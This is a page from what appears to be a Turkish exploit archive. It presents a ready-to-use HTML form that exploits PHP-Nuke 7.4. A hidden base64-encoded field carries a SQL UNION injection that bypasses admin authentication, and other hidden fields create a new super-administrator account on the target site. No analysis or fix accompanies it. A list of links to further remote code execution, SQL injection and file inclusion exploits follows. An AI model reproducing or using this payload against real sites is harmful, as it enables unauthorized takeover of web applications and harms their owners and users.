Full-TR - PHP-Nuke 7.4 Remote Privilege Escalation

Exploit / Web Apps Exploit / PHP-Nuke 7.4 Remote Privilege Escalation

Eklenme Tarihi: 2008-10-20 22:59

A demonstration exploit HTTP form is provided:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME:
<input type="text" name="add_aid">
<br>
NOME:
<input type="text" name="add_name">
<br>
PASSWORD:
<input type="text" name="add_pwd">
<br>
E-MAIL:
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

Yorumlar:

Hen�z Yorum Eklenmedi

Yorum Ekle

Keywords:

Benzer Sayfalar (Similar Pages):

Bulunamad�. (not found)

Bu Sayfalarda �lginizi �ekebilir (The Links Bellow May Attract You As Well):

Exploit / Web Apps Exploit / Turbo Seek Null Byte Error Discloses Files to Remote Users
Exploit / Web Apps Exploit / PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit
Exploit / Web Apps Exploit / phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
Exploit / Web Apps Exploit / Fastgraf's whois.cgi Remote Command Execution Exploit
Exploit / Web Apps Exploit / PostNuke PostWrap Module Remote Exploit
Exploit / Web Apps Exploit / Siteman <= 1.1.10 Remote Administrative Account Addition Exploit
Exploit / Web Apps Exploit / AWStats configdir Remote Command Execution Exploit (perl code)
Exploit / Web Apps Exploit / e107 include() Remote Exploit
Exploit / Web Apps Exploit / phpMyChat 0.14.5 Remote Improper File Permissions Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit
Exploit / Web Apps Exploit / GFHost PHP GMail Remote Command Execution Exploit
Exploit / Web Apps Exploit / TWiki 20030201 search.pm Remote Command Execution Exploit
Exploit / Web Apps Exploit / ocPortal 1.0.3 Remote File Inclusion
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version2)
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version)
Exploit / Web Apps Exploit / PHP-Nuke 6.x - 7.6 Top module Remote Sql Injection Exploit (working)
Exploit / Web Apps Exploit / phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.13 'downloads.php' mod Remote Exploit
Exploit / Web Apps Exploit / ZPanel <= 2.5 Remote SQL Injection Exploit
Exploit / Web Apps Exploit / phpDEV5 Remote Default Insecure Users Vuln
Exploit / Web Apps Exploit / Download Center Lite (DCL) <= 1.5 Remote File Inclusion
Exploit / Web Apps Exploit / PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution
Exploit / Web Apps Exploit / Webhints <= 1.03 Remote Command Execution Exploit (perl code) (3)
Exploit / Web Apps Exploit / Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)
Exploit / Web Apps Exploit / Guppy <= 4.5.11 (Delete Databases) Remote Denial of Service Exploit
Exploit / Web Apps Exploit / JiRos Banner Experience 1.0 (Create Admin Bypass) Remote Exploit
Exploit / Web Apps Exploit / Light Weight Calendar 1.x (date) Remote Code Execution Vulnerability
Exploit / Web Apps Exploit / d2kBlog 1.0.3 (memName) Remote SQL Injection Exploit